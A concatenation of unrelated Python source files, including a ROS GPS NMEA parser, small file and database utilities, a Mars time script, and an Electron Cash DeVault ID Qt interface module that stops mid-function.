# - ``sid`` must either be None or be previously unused.
# d1_gmn.app.views.asserts.is_unused()
# - ``pid`` must exist and be verified to be a PID.
# d1_gmn.app.views.asserts.is_pid()
# """
# chain_model = _get_or_create_chain_for_pid(pid)
# _map_sid_to_pid(chain_model, sid, pid)
# def add_pid_to_chain(sid, old_pid, new_pid):
# """Add a new revision ``new_pid`` to the chain that ``old_pid`` belongs to and
# update any SID to resolve to the new PID. Intended to be called in
# MNStorage.update().
#
# Preconditions:
# - ``sid`` must either be None or match the SID already assigned to the chain.
# - Both ``old_pid`` and ``new_pid`` must exist and be verified to be PIDs
# d1_gmn.app.views.asserts.is_pid()
# """
# chain_model = _get_or_create_chain_for_pid(old_pid)
# _add_pid_to_chain(chain_model, new_pid)
# _map_sid_to_pid(chain_model, sid, new_pid)
# def is_sid_in_revision_chain(sid, pid):
# """Determine if ``sid`` resolves to an object in the revision chain to which
# ``pid`` belongs.
#
# Preconditions:
# - ``sid`` is verified to exist. E.g., with d1_gmn.app.views.asserts.is_sid().
# """
# chain_pid_list = get_pids_in_revision_chain(pid)
# resolved_pid = resolve_sid(sid)
# return resolved_pid in chain_pid_list
# def update_or_create_sid_to_pid_map(sid, pid):
# """Update existing or create a new ``sid`` to ``pid`` association. Then create
# or update the ``sid`` to resolve to the ``pid``.
#
# Preconditions:
# - ``sid`` is verified to be unused if creating a standalone object (that may later become
# the first object in a chain).
# - ``sid`` is verified to belong to the given chain updating.
# - ``pid`` is verified to exist. E.g., with d1_gmn.app.views.asserts.is_pid().
# """
# d1_gmn.app.models.sid_to_pid(sid, pid)
# d1_gmn.app.models.sid_to_head_pid(sid, pid)
# def get_sid_by_pid(pid):
# """Get the SID to which the ``pid`` maps.
# Return None if there is no SID maps to ``pid``.
# """
# try:
# return d1_gmn.app.models.SeriesIdToPersistentId.objects.get(
# pid__did=pid
# ).sid.did
# except d1_gmn.app.models.SeriesIdToPersistentId.DoesNotExist:
# return None
# def move_sid_to_last_object_in_chain(pid):
# """Move SID to the last object in a chain to which ``pid`` belongs.
#
# - If the chain does not have a SID, do nothing.
# - If the SID already maps to the last object in the chain, do nothing.
#
# A SID always resolves to the last object in its chain. So System Metadata XML
# docs are used for introducing SIDs and setting initial mappings, but the
# database maintains the current mapping going forward.
#
# Preconditions:
# - PID is verified to exist. E.g., with d1_gmn.app.views.asserts.is_pid().
#
# Postconditions:
# - The SID maps to the last object in the chain.
# """
# sid = sysmeta_db.get_sid_by_pid(pid)
# if sid:
# chain_pid_list = sysmeta_db.get_pids_in_revision_chain(pid)
# update_sid(sid, chain_pid_list[-1])
# def update_revision_chain(pid, obsoletes_pid, obsoleted_by_pid, sid):
# with sysmeta_file.SysMetaFile(pid) as sysmeta_pyxb:
# sysmeta_file.update_revision_chain(
# sysmeta_pyxb, obsoletes_pid, obsoleted_by_pid, sid
# )
# sysmeta_db.update_revision_chain(sysmeta_pyxb)
# if sysmeta.obsoletes is not None:
# chain_pid_list = [pid]
# sci_obj = mn.models.ScienceObject.objects.get(pid__did=pid)
# while sci_obj.obsoletes:
# obsoletes_pid = sysmeta_pyxb.obsoletes.value()
# chain_pid_list.append(obsoletes_pid)
# sci_obj = mn.models.ScienceObject.objects.get(pid__did=obsoletes_pid)
# sci_obj = mn.models.ScienceObject.objects.get(pid__did=pid)
# while sci_obj.obsoleted_by:
# obsoleted_by_pid = sysmeta_pyxb.obsoleted_by.value()
# chain_pid_list.append(obsoleted_by_pid)
# sci_obj = mn.models.ScienceObject.objects.get(pid__did=obsoleted_by_pid)
# return chain_pid_list
|
#!/usr/bin/env python
import math
import rospy
from serial_buffer import SerialBuffer as SerialBuffer
from gps_common.msg import GPSFix, GPSStatus
from std_srvs.srv import Trigger, TriggerResponse
def to_float(s):
try:
val = float(s)
except ValueError:
val = float('nan')
return val
def to_int(s):
try:
val = int(s)
except ValueError:
val = -1
return val
class GPSReader:
def __init__(self, device="/dev/ttyUSB0", baudrate=115200):
self.sb = SerialBuffer(device, baudrate)
if not self.sb.is_open():
print "Cannot open port"
exit()
self.reset_srv = rospy.Service('rtk_gps/reset', Trigger, self.reset_callback)
        self.pub = rospy.Publisher('/rtk_gps/gps', GPSFix, queue_size=10)
self.msg = GPSFix()
def spin_once(self):
serial_msg = self.sb.spin_once()
if serial_msg:
try:
self.process(serial_msg)
            except Exception as e:
                rospy.logwarn('Failed to parse message: %s', e)
def reset_callback(self, req):
        print('Reset')
return TriggerResponse(True, 'Reset')
def process(self, msg):
if msg[0] == '$PTNL':
if len(msg) == 13:
# mm.northing = float(msg[4])
# mm.easting = float(msg[6])
self.msg.err_vert = to_float(msg[4])
self.msg.err_horz = to_float(msg[6])
self.msg.altitude = to_float(msg[11][3:])
quality = to_int(msg[8])
self.msg.status.status = {0: GPSStatus.STATUS_NO_FIX,
1: GPSStatus.STATUS_FIX,
2: GPSStatus.STATUS_FIX,
3: GPSStatus.STATUS_DGPS_FIX}[quality]
self.msg.status.satellites_used = to_int(msg[9])
self.msg.gdop = to_float(msg[10])
else:
                rospy.logerr('Wrong number of fields in $PTNL message: 13 expected but %d given', len(msg))
return
elif msg[0] == '$PSAT':
if len(msg) != 7:
                rospy.logerr('Wrong number of fields in $PSAT message: 7 expected but %d given', len(msg))
return
self.msg.track = to_float(msg[3]) / 180.0 * math.pi
self.msg.pitch = to_float(msg[4]) / 180.0 * math.pi
self.msg.roll = to_float(msg[5]) / 180.0 * math.pi
elif msg[0] == '$GPRMC':
if len(msg) != 14:
                rospy.logerr('Wrong number of fields in $GPRMC message: 14 expected but %d given', len(msg))
return
if msg[2] == 'V':
self.msg.status.status = GPSStatus.STATUS_NO_FIX
else:
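                # NMEA encodes angles as [d]ddmm.mmmm (degrees then minutes),
                # e.g. 4807.038 -> 48 deg + 7.038 min / 60 = 48.1173 deg; the
                # floor division / modulo below performs that conversion.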
latitude = (to_float(msg[3]) if msg[4] == 'N' else -to_float(msg[3]))
self.msg.latitude = latitude // 100 + (latitude % 100) / 60
longitude = (to_float(msg[5]) if msg[6] == 'E' else -to_float(msg[5]))
self.msg.longitude = longitude // 100 + (longitude % 100) / 60
self.msg.speed = to_float(msg[7])
self.msg.track = to_float(msg[8])
if msg[12] == 'D':
self.msg.status.status = GPSStatus.STATUS_DGPS_FIX
elif msg[0] == '$GPGGA':
if len(msg) != 15:
                rospy.logerr('Wrong number of fields in $GPGGA message: 15 expected but %d given', len(msg))
return
latitude = (to_float(msg[2]) if msg[3] == 'N' else -to_float(msg[2]))
self.msg.latitude = latitude // 100 + (latitude % 100) / 60
longitude = (to_float(msg[4]) if msg[5] == 'E' else -to_float(msg[4]))
self.msg.longitude = longitude // 100 + (longitude % 100) / 60
self.publish()
elif msg[0] == '$GPTRA':
pass
else:
rospy.logwarn('Unknown msg:' + str(msg))
return
def publish(self):
self.msg.header.stamp = rospy.Time.now()
self.pub.publish(self.msg)
if __name__ == "__main__":
rospy.init_node('rtk_gps')
device = rospy.get_param("~device", "/dev/ttyUSB0")
reader = GPSReader(device)
while not rospy.is_shutdown():
reader.spin_once()
|
import os
def get_folder_size(dir_path):
"""
    Computes the total size of a folder (all files and subfolders).
    :param dir_path: path of the folder
    :return: total size of the folder, in bytes
    :rtype: int
"""
total_size = 0
d = os.scandir(dir_path)
for entry in d:
try:
if entry.is_dir():
total_size += get_folder_size(entry.path)
else:
total_size += entry.stat().st_size
except FileNotFoundError:
# file was deleted during scan
pass
return total_size
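# Usage sketch (hypothetical path):
#
#   size_bytes = get_folder_size("/var/log")
#   print("%.1f MiB" % (size_bytes / 1024 ** 2))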
def sanitize_filename(filename):
"""
Removes illegal characters from a string in order to obtain
a valid file name
:param filename: non-sanitized filename
:return: sanitized filename
:rtype: str
"""
keep_characters = (' ', '.', '_')
return "".join(c for c in filename if c.isalnum() or c in keep_characters).rstrip()
|
import hashlib
from typing import Optional
import time
from datetime import datetime
from flask import json
import pymongo
from .connect2db import TIME_RECORDER_DB as DB
class Activity():
    def __init__(self, name: str, description: str = ""):
        self._id: Optional[str] = None
        self.name: str = name
        self.description: str = description
        now = datetime.now()
        self.date: str = now.strftime("%Y-%m-%d")
        self.beginning: str = now.strftime("%H:%M")
        self.end: Optional[str] = None
        self.total: Optional[str] = None
        self.total_hours: float = -1
@staticmethod
def id(created_at):
id_fields = {"created_at": created_at}
serialized = json.dumps(id_fields, separators=(",", ":"), sort_keys=True, ensure_ascii=False)
return hashlib.sha1(serialized.encode("utf-8")).hexdigest()
@staticmethod
def find_by_date(date:str):
query = { "date": date }
cursor = DB.activity.find(query)
return list(cursor)
@staticmethod
def find_last_of_date(date:str):
query = { "date": date }
cursor = DB.activity.find(query).sort([("created_at", pymongo.DESCENDING)])
return next(cursor, None)
@staticmethod
def update_activity(activity_id, update_fields):
query = {
"_id": activity_id
}
update_doc = {
"$set": update_fields
}
update_result = DB.activity.find_one_and_update(query, update_doc, return_document=pymongo.ReturnDocument.AFTER)
return update_result
def save(self):
self.created_at = time.time()
self._id = Activity.id(self.created_at)
DB.activity.insert_one(vars(self))
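# Minimal usage sketch (assumes a reachable MongoDB behind connect2db; the
# field values are hypothetical):
#
#   act = Activity("writing", "draft blog post")
#   act.save()
#   Activity.update_activity(act._id, {"end": "17:30"})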
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Oct 20 20:30:36 2019
@author : greg
@purpose : trivial program to be executed with the shell script marsnow to print
the LMST date of 'now'
No argument needed
"""
from MarsTimeConverter import MarsTimeConverter
from pathlib import Path
import os, sys
import getopt
def main(argv):
try:
MARSCONVERTER = os.environ["MARSCONVERTER"]
except KeyError:
MARSCONVERTER = ""
landerconfigfile = MARSCONVERTER+"/"+'./landerconfig.xml'
my_file = Path(landerconfigfile)
try:
opts, args = getopt.getopt(argv,"ho:",["help","option="])
except getopt.GetoptError:
        print('python marsnow.py -o <option>')
        print('python marsnow.py -h for help')
sys.exit(2)
option = None
for opt, arg in opts:
        if opt in ('-h', '--help'):
print ('python marsnow.py -o <option> \n'\
' function to get LMST now with various formats.\n\n'\
' @author: Greg Sainton (sainton@ipgp.fr)\n'\
' @version:1.1 (jan 20)\n\n'\
' -o --option <option> to return the sol \n'\
' if <option> = date -> return the date and time\n'\
' if <option> = sol -> return the sol number '\
)
sys.exit()
elif opt in ["--option", "--opt", "-o"]:
option = str(arg)
else:
option = None
if my_file.is_file():
mDate = MarsTimeConverter(landerconfigfile)
else:
sys.exit("landerconfigfile is missing")
marsDateNow = mDate.get_utc_2_lmst()
posT = marsDateNow.find('T')
if option is not None:
if option.lower() == "sol":
print(int(marsDateNow[0:posT]))
elif option.lower() == "date":
print(marsDateNow)
else:
print("Today, it is ", marsDateNow)
print("SOL ",marsDateNow[:posT] ,"from ", \
str(mDate.get_lmst_to_utc(lmst_date=int(marsDateNow[:posT]))), \
" UTC to ", str(mDate.get_lmst_to_utc(lmst_date=(int(marsDateNow[:posT])+1))))
if __name__ == '__main__':
main(sys.argv[1:])
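# Example invocations (assuming MARSCONVERTER points at a directory containing
# landerconfig.xml):
#   python marsnow.py           # prints the full "Today, it is ..." summary
#   python marsnow.py -o sol    # prints only the sol number
#   python marsnow.py -o date   # prints only the LMST date string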
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 5 11:24:12 2020
@author: ihousman
"""
import ee,datetime
ee.Initialize()
def getDate(m):
    return datetime.datetime.fromtimestamp(float(m) / 1000).strftime('%Y-%m-%d')
date = '2020-06-04'
######################################
x = ee.data.getTaskList()
ids = [i['description'] for i in x if i['description'].find('TDD_') > -1 and i['state'] == 'CANCELLED' and getDate(i['creation_timestamp_ms']) == date]
print(ids)
print(len(ids))
|
# Read two matrices from stdin: first a line "rows cols", then one row per line.
rows1, cols1 = [int(i) for i in input().split()]
matrix1 = [[int(r) for r in input().split()] for _ in range(rows1)]
rows2, cols2 = [int(i) for i in input().split()]
matrix2 = [[int(r) for r in input().split()] for _ in range(rows2)]
if cols1 == rows2:
    # Classic triple-loop matrix product.
    mr = [[0] * cols2 for _ in range(rows1)]
    for i in range(rows1):
        for j in range(cols2):
            for k in range(cols1):
                mr[i][j] += matrix1[i][k] * matrix2[k][j]
            mr[i][j] = str(mr[i][j])
    for row in mr:
        print(" ".join(row))
else:
    print("The matrices cannot be multiplied")
|
#!/usr/bin/python
import time
print(int(time.time()))
print(time.time())
|
import sqlite3
from connections_db.connections_cryptocurrencies import ConnectionDBCryptoCurrencies
dbTickers = sqlite3.connect("database/tickers.db")
dbTickers.execute("create table dataStock(nome text, logo text, info text, ticker text, dy number, precoMinimoCotaEmUmAno number, precoMaximoCotaEmUmAno number, dividendoEmUmAno number, oscilacaoCota number, valorCota number ,linkSiteRi text, valorizacaoCotaUmAno number, cnpj text);")
dbTickers.commit()
ConnectionDBCryptoCurrencies().createTable()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Electron Cash - A Bitcoin Cash SPV Wallet
# This file Copyright (c) 2019 Calin Culianu <calin.culianu@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
'''
DeVault IDs related classes and functions - Qt UI related.
'''
# TODO: whittle these * imports down to what we actually use
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from .util import *
from .qrcodewidget import QRCodeWidget
import queue
import time
import requests
from typing import Tuple, List, Callable
from enum import IntEnum
from electroncash import cashacct
from electroncash import util
from electroncash import web
from electroncash.address import Address, UnknownAddress
from electroncash.i18n import _, ngettext
from electroncash.wallet import Abstract_Wallet
class VerifyingDialog(WaitingDialog):
def __init__(self, parent, message, task, on_success=None, on_error=None, auto_cleanup=True,
*, auto_show=True, auto_exec=False, title=None, disable_escape_key=False):
super().__init__(parent, message, task, on_success=on_success,
on_error=on_error, auto_cleanup=auto_cleanup,
auto_show=False, auto_exec=False,
title=title or _('Verifying DeVault ID'),
disable_escape_key=disable_escape_key)
hbox = QHBoxLayout()
self._vbox.removeWidget(self._label)
icon_lbl = QLabel()
icon_lbl.setPixmap(QIcon(":icons/cashacct-logo.png").pixmap(50))
hbox.addWidget(icon_lbl)
hbox.addWidget(self._label)
self._vbox.addLayout(hbox)
prog = QProgressBar()
prog.setRange(0,0)
self._vbox.addWidget(prog)
if auto_show and not auto_exec:
self.open()
elif auto_exec:
self.exec_()
destroyed_print_error(self)
def verify_multiple_blocks(blocks : List[int], parent : MessageBoxMixin, wallet : Abstract_Wallet, timeout=10.0) -> int:
    ''' Pass a list of block numbers and this will attempt to verify them all in
    one pass. This is used by the Contacts tab to verify unverified DeVault IDs
    that may have been imported. Returns the number of successfully verified
    blocks, or None on user cancel. '''
if not len(blocks):
return 0
blocks = set(blocks)
nblocks = len(blocks)
q = queue.Queue()
def done_cb(thing):
if isinstance(thing, cashacct.ProcessedBlock) and thing.reg_txs:
q.put(thing)
else:
q.put(None)
ctr = 0
def thread_func():
nonlocal ctr
for number in blocks:
wallet.cashacct.verify_block_asynch(number, success_cb=done_cb, error_cb=done_cb, timeout=timeout)
errs = 0
while ctr + errs < nblocks:
try:
thing = q.get(timeout=timeout)
if thing is None:
errs += 1
else:
ctr += 1
except queue.Empty:
return
code = VerifyingDialog(parent.top_level_window(),
ngettext("Verifying {count} block please wait ...",
"Verifying {count} blocks please wait ...", nblocks).format(count=nblocks),
thread_func, auto_show=False, on_error=lambda e: parent.show_error(str(e))).exec_()
if code != QDialog.Accepted:
return None
return ctr
def resolve_cashacct(parent : MessageBoxMixin, name : str, wallet : Abstract_Wallet = None) -> Tuple[cashacct.Info, str]:
''' Throws up a WaitingDialog while it resolves a DeVault ID.
Goes out to network, verifies all tx's.
Returns: a tuple of: (Info, Minimally_Encoded_Formatted_AccountName)
Argument `name` should be a DeVault ID name string of the form:
name#number.123
name#number
name#number.; etc
    If the result would be ambiguous, that is considered an error, so enough
    of the account name#number.collision_hash needs to be specified to
    unambiguously resolve the DeVault ID.
On failure throws up an error window and returns None.'''
from .main_window import ElectrumWindow
if isinstance(parent, ElectrumWindow) and not wallet:
wallet = parent.wallet
assert isinstance(wallet, Abstract_Wallet)
class Bad(Exception): pass
try:
if not wallet.network or not wallet.network.interface:
raise Bad(_("Cannot verify DeVault ID as the network appears to be offline."))
ca_tup = wallet.cashacct.parse_string(name)
if not ca_tup:
raise Bad(_("Invalid DeVault ID name specified: {name}").format(name=name))
results = None
def resolve_verify():
nonlocal results
results = wallet.cashacct.resolve_verify(name)
code = VerifyingDialog(parent.top_level_window(),
_("Verifying DeVault ID {name} please wait ...").format(name=name),
resolve_verify, on_error=lambda e: parent.show_error(str(e)), auto_show=False).exec_()
if code == QDialog.Rejected:
# user cancel operation
return
if not results:
raise Bad(_("DeVault ID not found: {name}").format(name=name) + "\n\n"
+ _("Could not find the DeVault ID name specified. "
"It either does not exist or there may have been a network connectivity error. "
"Please double-check it and try again."))
if len(results) > 1:
tup = multiple_result_picker(parent=parent, wallet=wallet, results=results)
if not tup:
# user cancel
return
results = [tup]
info, mch = results[0]
name = wallet.cashacct.fmt_info(info, mch)
if not isinstance(info.address, Address):
raise Bad(_("Unsupported payment data type.") + "\n\n"
+ _("The DeVault ID {name} uses an account type that "
"is not supported by Electron Cash.").format(name=name))
return info, name
except Bad as e:
parent.show_error(str(e))
return None
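# Usage sketch (hypothetical name; must be called from an ElectrumWindow
# context, since resolution goes out to the network with a waiting dialog):
#
#   tup = resolve_cashacct(window, "satoshi#123")
#   if tup:
#       info, formatted_name = tup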
class ButtonAssociatedLabel(QLabel):
    ''' A QLabel that, if clicked on, sends a 'click()' call to an associated
QAbstractButton. '''
def __init__(self, *args, **kwargs):
but = kwargs.pop('button', None)
super().__init__(*args, **kwargs)
self.but = but
self.setTextInteractionFlags(self.textInteractionFlags() | Qt.TextSelectableByMouse)
def setButton(self, b : QAbstractButton): self.but = b
def button(self) -> QAbstractButton: return self.but
def mouseReleaseEvent(self, e):
super().mouseReleaseEvent(e)
if self.but:
if self.but.isEnabled():
self.but.click()
elif self.but.toolTip() and not self.hasSelectedText():
QToolTip.showText(QCursor.pos(), self.but.toolTip(), self)
def naked_button_style() -> str:
    ''' Returns a stylesheet for a small 'naked' (flat) QPushButton, as used in
    the lookup results and other associated widgets in this file '''
but_style_sheet = 'QPushButton { border-width: 1px; padding: 0px; margin: 0px; }'
if not ColorScheme.dark_scheme:
but_style_sheet += ''' QPushButton { border: 1px solid transparent; }
QPushButton:hover { border: 1px solid #3daee9; }'''
return but_style_sheet
def button_make_naked(but: QAbstractButton) -> QAbstractButton:
    ''' Applies a handful of style tweaks to a button to "make it naked",
    which is the look we use for the lookup results and various other odds and
    ends. Returns the button passed to it. '''
but.setStyleSheet(naked_button_style())
but.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
return but
class InfoGroupBox(PrintError, QGroupBox):
class ButtonType(IntEnum):
NoButton = 0 # If this is specified to button_type, then the buttons will be hidden. selectedItem and selectedItems will have undefined results.
Radio = 1 # If specified, the on-screen buttons will be QRadioButtons and selectedItems() will always have 0 or 1 item.
CheckBox = 2 # If specified, the on-screen buttons will be QCheckBox and selectedItems() may be a list of more than 1 result
def __init__(self,
parent : QWidget, # widget parent for layout/embedding/etc
main_window : MessageBoxMixin, # may be same as 'parent'; will raise if not an ElectrumWindow instance
items: List[Tuple[cashacct.Info, str, str]] = [], # list of 2 or 3 tuple : Info, minimal_chash[, formatted_string]
title : str = None,
button_type : ButtonType = ButtonType.Radio, # Note that if CheckBox, the buttonGroup will be made non-exclusive and selectedItems() may return more than 1 item.
extra_buttons : List[Callable[[Tuple[cashacct.Info, str, str]], QAbstractButton]] = [], # pass a list of callables that take a 3-tuple for each item and return a button
show_addresses : bool = True, # if False, the address label remains hidden
custom_contents_margins : Tuple[int] = None, # if specified, use this as the contents margins for the internal layout widget
):
from .main_window import ElectrumWindow
assert isinstance(main_window, ElectrumWindow)
super().__init__(parent)
self.main_window = main_window
self.wallet = self.main_window.wallet
self.extra_buttons = extra_buttons or []
self.show_addresses = bool(show_addresses)
if isinstance(custom_contents_margins, (tuple, list)) and len(custom_contents_margins) == 4 and all(isinstance(x, (int, float)) for x in custom_contents_margins):
self.custom_contents_margins = custom_contents_margins
else:
self.custom_contents_margins = None
assert isinstance(self.wallet, Abstract_Wallet)
self._setup()
self.setItems(items=items, title=title, auto_resize_parent=False, button_type=button_type)
def _setup(self):
self.w = QWidget(self)
self.vbox = QVBoxLayout(self)
self.vbox.setContentsMargins(0,0,0,0)
self.vbox.addWidget(self.w)
self._but_grp = QButtonGroup(self) # client code shouldn't use this but instead use selectedItems(), etc
self.no_items_text = _('No DeVault IDs') # client code may set this directly
def setItems(self,
items : List[Tuple[cashacct.Info, str, str]], # list of 2 or 3 tuple : Info, minimal_chash[, formatted_string]
title = None, auto_resize_parent = True, sort=True,
button_type : ButtonType = ButtonType.Radio):
items = items or []
nitems = len(items)
title = ngettext("{number} DeVault ID", "{number} DeVault IDs", nitems).format(number=nitems) if title is None else title
wallet = self.wallet
if items and (sort or len(items[0]) != 3):
# sort items by formatted cash account string, also adding the string to
# the items tuples; tuples now are modified to 3 elements:
# (info, min_chash, formatted_ca_string)
formatter = lambda x: (x[0], x[1], wallet.cashacct.fmt_info(x[0], x[1]))
if sort:
items = sorted((formatter(x) for x in items), key=lambda tup:tup[2])
else:
items = [formatter(x) for x in items]
self._items = items
self.button_type = button_type
self.setTitle(title)
self.refresh()
if auto_resize_parent and self.parent():
weakParent = util.Weak.ref(self.parent())
QTimer.singleShot(0, lambda: weakParent() and weakParent().resize(weakParent().sizeHint()))
def buttonGroup(self) -> QButtonGroup:
''' The button group id's will point to indices in self.items() '''
return self._but_grp
def checkItemWithInfo(self, info : cashacct.Info):
''' Pass an info object and the item that corresponds to that
Info object will be checked. Pass None to uncheck all items. '''
for i, item in enumerate(self._items):
if info is None:
self._but_grp.button(i).setChecked(False)
elif item[0] == info:
self._but_grp.button(i).setChecked(True)
def items(self) -> List[Tuple[cashacct.Info, str, str]]:
''' The list of items on-screen. self.buttonGroup()'s ids will point
to indices in this list.
Returned list items are 3-tuples of:
(Info, min_chash: str, fmtd_acct_name: str) '''
return self._items
def selectedItem(self) -> Tuple[cashacct.Info, str, str]:
''' Returns the currently selected item tuple or None if none is selected '''
items = self.selectedItems()
if items:
return items[0]
def selectedItems(self) -> List[Tuple[cashacct.Info, str, str]]:
''' In multi-select mode (CheckBox mode), returns the currently selected
items as a list of 3-tuple. '''
ret = []
buts = self._but_grp.buttons()
for but in buts:
if but.isChecked():
which = self._but_grp.id(but)
if which > -1 and which < len(self._items):
ret.append(self._items[which])
return ret
def refresh(self):
from .main_window import ElectrumWindow
parent = self.main_window
wallet = self.wallet
items = self._items
button_type = self.button_type
assert all(len(x) == 3 for x in items)
but_grp = self._but_grp
cols, col, row = 2, 0, -1
if self.w:
# save selection
saved_selection = [tup[0] for tup in self.selectedItems()]
# tear down the dummy container widget from before and everything
# in it
for c in self.findChildren(QAbstractButton, "InfoGroupBoxButton"):
if isinstance(c, QAbstractButton):
but_grp.removeButton(c)
self.w.hide()
self.vbox.removeWidget(self.w)
self.w.setParent(None)
self.w.deleteLater()
self.w = None
self.w = w = QWidget(self)
self.vbox.addWidget(w)
grid = QGridLayout(w)
if self.custom_contents_margins:
grid.setContentsMargins(*self.custom_contents_margins)
def view_tx_link_activated(txid):
if isinstance(parent, ElectrumWindow):
parent.do_process_from_txid(txid=txid, tx_desc=wallet.get_label(txid))
def view_addr_link_activated(addr):
if isinstance(parent, ElectrumWindow):
try:
address = Address.from_string(addr)
parent.show_address(address, parent=parent.top_level_window())
except Exception as e:
parent.print_error(repr(e))
# We do it this way with BUTTON_FACTORY in case we want to expand
# this facility later to generate even more dynamic buttons.
if button_type == __class__.ButtonType.CheckBox:
BUTTON_FACTORY = lambda *args: QCheckBox()
but_grp.setExclusive(False)
else:
BUTTON_FACTORY = lambda *args: QRadioButton()
but_grp.setExclusive(True)
hide_but = button_type == __class__.ButtonType.NoButton
grid.setVerticalSpacing(4)
if not items:
label = WWLabel("<i>" + self.no_items_text + "</i>")
label.setAlignment(Qt.AlignCenter)
grid.addWidget(label, 0, 0, -1, -1)
for i, item in enumerate(items):
col = col % cols
if not col:
row += 1
info, min_chash, ca_string = item
ca_string_em = f"{ca_string} {info.emoji}"
            # Radio button (by itself in column 0)
rb = BUTTON_FACTORY(info, min_chash, ca_string, ca_string_em)
rb.setObjectName("InfoGroupBoxButton")
rb.setHidden(hide_but)
rb.setDisabled(hide_but) # hidden buttons also disabled to prevent user clicking their labels to select them
is_valid = True
is_mine = False
is_change = False
if not isinstance(info.address, Address):
rb.setDisabled(True)
is_valid = False
rb.setToolTip(_('Electron Cash currently only supports DeVault ID types 1 & 2'))
elif wallet.is_mine(info.address):
is_mine = True
is_change = wallet.is_change(info.address)
but_grp.addButton(rb, i)
grid.addWidget(rb, row*3, col*5, 1, 1)
pretty_string = info.emoji + " " + ca_string[:-1]
chash_extra = info.collision_hash[len(min_chash):]
if not min_chash:
chash_extra = "." + chash_extra
# DeVault ID name
ca_lbl = ButtonAssociatedLabel(f'<b>{pretty_string}</b><font size=-1><i>{chash_extra}</i></font><b>;</b>', button=rb)
grid.addWidget(ca_lbl, row*3, col*5+1, 1, 1)
# View tx ...
viewtx = _("View tx")
view_tx_lbl = WWLabel(f'<font size=-1><a href="{info.txid}">{viewtx}...</a></font>')
grid.addWidget(view_tx_lbl, row*3, col*5+2, 1, 1)
view_tx_lbl.setToolTip(_("View Registration Transaction"))
# misc buttons
hbox = QHBoxLayout()
hbox.setContentsMargins(0,0,0,0)
hbox.setSpacing(4)
for func in self.extra_buttons:
if callable(func):
ab = func(item)
if isinstance(ab, QAbstractButton):
button_make_naked(ab)
hbox.addWidget(ab)
# copy button
copy_but = QPushButton(QIcon(":icons/copy.png"), "")
button_make_naked(copy_but)
hbox.addWidget(copy_but)
grid.addLayout(hbox, row*3, col*5+3, 1, 1)
# end button bar
if isinstance(parent, ElectrumWindow):
view_tx_lbl.linkActivated.connect(view_tx_link_activated)
copy_but.clicked.connect(lambda ignored=None, ca_string_em=ca_string_em, copy_but=copy_but:
parent.copy_to_clipboard(text=ca_string_em, tooltip=_('DeVault ID copied to clipboard'), widget=copy_but) )
copy_but.setToolTip('<span style="white-space:nowrap">'
+ _("Copy <b>{cash_account_name}</b>").format(cash_account_name=ca_string_em)
+ '</span>')
else:
view_tx_lbl.setHidden(True)
copy_but.setHidden(True)
if self.show_addresses:
addr_lbl = ButtonAssociatedLabel('', button=rb)
if is_valid:
if is_mine:
addr_lbl.setText(f'<a href="{info.address.to_ui_string()}"><pre>{info.address.to_ui_string()}</pre></a>')
addr_lbl.linkActivated.connect(view_addr_link_activated)
addr_lbl.setToolTip(_('Wallet') + ' - ' + (_('Change Address') if is_change else _('Receiving Address')))
addr_lbl.setButton(None) # disable click to select
else:
addr_lbl.setText(f'<pre>{info.address.to_ui_string()}</pre>')
else:
addr_lbl.setText('<i>' + _('Unsupported Account Type') + '</i>')
addr_lbl.setToolTip(rb.toolTip())
grid.addWidget(addr_lbl, row*3+1, col*5+1, 1, 3)
if (col % cols) == 0:
# insert stretch in between the two columns
spacer = QSpacerItem(1,0)
grid.addItem(spacer, row, col*5+4, 1, 1)
grid.setColumnStretch(col*5+4, 10)
if self.show_addresses:
                # In-between row spacer; only added when showing addresses,
                # to keep the address line visually closer to the line above it.
spacer = QSpacerItem(1, 8)
grid.addItem(spacer, row*3+2, col*5, 1, 4)
col += 1
if len(items) == 1:
# just 1 item, put it on the left
grid.addItem(QSpacerItem(2,1), 0, 5)
grid.setColumnStretch(5, 100)
if len(items) <= 2:
# just 1 row, push it up to the top
grid.addItem(QSpacerItem(1,2), 3, 0, -1, -1)
grid.setRowStretch(3, 100)
if saved_selection and self.button_type != self.ButtonType.NoButton:
for info in saved_selection:
self.checkItemWithInfo(info)
else:
self.checkItemWithInfo(None)
def multiple_result_picker(parent, results, wallet=None, msg=None, title=None, gbtext=None):
    ''' Pops up a modal dialog telling you to pick a result. Used by the
    Contacts tab edit function, etc. '''
assert parent
from .main_window import ElectrumWindow
if isinstance(parent, ElectrumWindow) and not wallet:
wallet = parent.wallet
assert isinstance(wallet, Abstract_Wallet)
msg = msg or _('Multiple results were found, please select an option from the items below:')
title = title or _("Select DeVault ID")
d = WindowModalDialog(parent, title)
util.finalization_print_error(d) # track object lifecycle
destroyed_print_error(d)
vbox = QVBoxLayout(d)
lbl = WWLabel(msg)
vbox.addWidget(lbl)
gb = InfoGroupBox(d, parent, results)
vbox.addWidget(gb)
ok_but = OkButton(d)
buts = Buttons(CancelButton(d), ok_but)
vbox.addLayout(buts)
ok_but.setEnabled(False)
but_grp = gb.buttonGroup()
but_grp.buttonClicked.connect(lambda x=None: ok_but.setEnabled(gb.selectedItem() is not None))
code = d.exec_()
if code == QDialog.Accepted:
item = gb.selectedItem()
if item:
